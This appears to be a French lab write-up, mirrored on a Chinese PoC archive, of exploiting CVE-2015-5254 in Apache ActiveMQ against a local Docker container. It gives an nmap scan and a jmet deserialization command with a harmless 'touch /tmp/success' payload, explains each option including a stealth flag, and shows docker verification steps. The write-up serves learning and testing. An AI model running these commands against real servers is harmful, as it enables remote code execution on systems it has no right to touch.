关联漏洞
描述
La vulnérabilité CVE-2015-5254 est une faille de sécurité dans Apache ActiveMQ, un serveur de messages open source largement utilisé pour la communication entre applications. Cette vulnérabilité touche les versions d'ActiveMQ jusqu'à 5.13.0 et réside dans le manque de filtrage sur les données d'entrées JMS ObjectMessage enyoyées
介绍
# Exploitation-de-la-vuln-rabilit-CVE-2015-5254-
La vulnérabilité CVE-2015-5254 est une faille de sécurité dans Apache ActiveMQ, un serveur de messages open source largement utilisé pour la communication entre applications. Cette vulnérabilité touche les versions d'ActiveMQ jusqu'à 5.13.0 et réside dans le manque de filtrage sur les données d'entrées JMS ObjectMessage enyoyées
Scan du réseau :
nmap -p 61616 -Pn -T5 -n -sC -sV 172.17.0.1

On lance actiiveMQ 2015 via son dossier téléchargé avec docker :

On vérife la version d'activeMQ :

Il s'agit de la version 5.11.1
Exploitattion :
Pour cette vunérabité, on utilisera la commande :
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 172.17.0.1 61616
Cette comande exécute une tentative d'exploitation de la vulnérabilité CVE-2015-5254 d'Apache ActiveMQ en utilisant l'outil jmet. Voici un décryptage de chaque option de la commande :
java -jar jmet-0.1.0-all.jar : Lance l'outil jmet (Java Message Exploitation Tool) en utilisant le fichier JAR autonome (jmet-0.1.0-all.jar).
-Q event : Spécifie la "queue" ou la file d'attente cible dans ActiveMQ, nommée ici "event". L'outil enverra le message malveillant via cette queue.
-I ActiveMQ : Indique que la cible est un serveur Apache ActiveMQ.
-s : Lance l'exploitation en mode "stealth" (furtif), ce qui peut parfois minimiser les logs ou avertissements générés sur la cible.
-Y "touch /tmp/success" : Indique la charge utile malveillante qui sera exécutée sur le serveur cible en cas de succès. Dans ce cas, la commande touch /tmp/success crée un fichier nommé success dans le dossier /tmp pour prouver que l'exploitation a fonctionné.
-Yp ROME : Utilise le payload "ROME" pour tenter d'exploiter la vulnérabilité (ROME est ici un type spécifique de charge utile pris en charge par l'outil pour ActiveMQ).
172.17.0.1 61616 : Spécifie l'adresse IP (1720.17.0.1) et le port (61616) du serveur Apache ActiveMQ cible.
En résumé
Cette commande tente d'exploiter une faille de désérialisation sur Apache ActiveMQ en injectant un message malveillant dans la file d'attente "event" pour exécuter une commande à distance. Si l'exploitation réussit, le serveur ActiveMQ cible exécute la commande touch /tmp/success, ce qui est un indicateur d'une exploitation réussie (création d'un fichier).
En gros, On veux infiltrer un fichier nommé sucsess dans dans le système de fichier du serveur activemq en locurrence dans /tmp/.

On remarque que l'exploit à bien abouti !!!
On a le message de détection suivant sur Apache activemq :

On clique sur le message:

On tape l'ensemble des commandes suivante :
docker ps -a
Pour connaitre le conteneur d'activeMQ en cours, on voit le conteneur 19ab278527c7
On fait :
docker exec -it 19ab278527c7 /bin/bash
Pour s'authenfier au serveur activemq via son conteneur.
On constate qu'on a réussi l'authentification et puis on a bien vérifier la création du fichier sucess dans /tmp/ :

Fin de l'exploit !!!
文件快照
[4.0K] /data/pocs/f58ed577fcbcb298ad79ee3f61a9730e25a07829
└── [3.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。